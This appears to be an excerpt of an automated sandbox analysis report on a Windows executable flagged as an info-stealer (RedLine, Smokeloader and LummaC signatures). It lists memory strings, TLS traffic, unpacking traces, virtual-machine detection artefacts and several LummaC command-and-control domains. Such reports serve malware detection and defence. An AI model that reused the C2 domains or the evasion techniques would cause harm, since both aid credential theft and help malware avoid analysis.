            Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003269000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850465870.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672
            Source: k6A01XaeEn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: k6A01XaeEn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7736
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\19601ff9-aeab-4de0-9e68-95a6413f5cacJump to behavior
            Source: k6A01XaeEn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: k6A01XaeEn.exe, 00000000.00000003.1818615751.0000000003248000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850513457.0000000003211000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: k6A01XaeEn.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile read: C:\Users\user\Desktop\k6A01XaeEn.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\k6A01XaeEn.exe "C:\Users\user\Desktop\k6A01XaeEn.exe"
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeUnpacked PE file: 0.2.k6A01XaeEn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeUnpacked PE file: 0.2.k6A01XaeEn.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4ABA0 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4ABA0 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B492A1 push edi; iretd 0_3_00B492A2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C3A3 pushad ; ret 0_3_00B4C451
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C3A3 pushad ; ret 0_3_00B4C451
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C488 pushad ; ret 0_3_00B4C4C9
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C488 pushad ; ret 0_3_00B4C4C9
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4DAFA push ecx; retf 0_3_00B4DB20
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4DAFA push ecx; retf 0_3_00B4DB20
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4DAFA push ecx; retf 0_3_00B4DB20
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4AAC5 push eax; ret 0_3_00B4AAD2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4AAC5 push eax; ret 0_3_00B4AAD2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B48AC1 push esp; ret 0_3_00B48AC2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C329 pushad ; ret 0_3_00B4C331
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C329 pushad ; ret 0_3_00B4C331
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4AB75 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4AB75 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C373 pushad ; ret 0_3_00B4C379
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B4C373 pushad ; ret 0_3_00B4C379
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeCode function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: k6A01XaeEn.exeStatic PE information: section name: .text entropy: 7.371498425770648
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe TID: 7800Thread sleep time: -210000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe TID: 7804Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.6.drBinary or memory string: VMware
            Source: k6A01XaeEn.exe, 00000000.00000002.2341083797.0000000000AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|0
            Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.drBinary or memory string: vmci.sys
            Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.drBinary or memory string: VMware20,1
            Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeQueries volume information: C:\ VolumeInformationJump to behavior
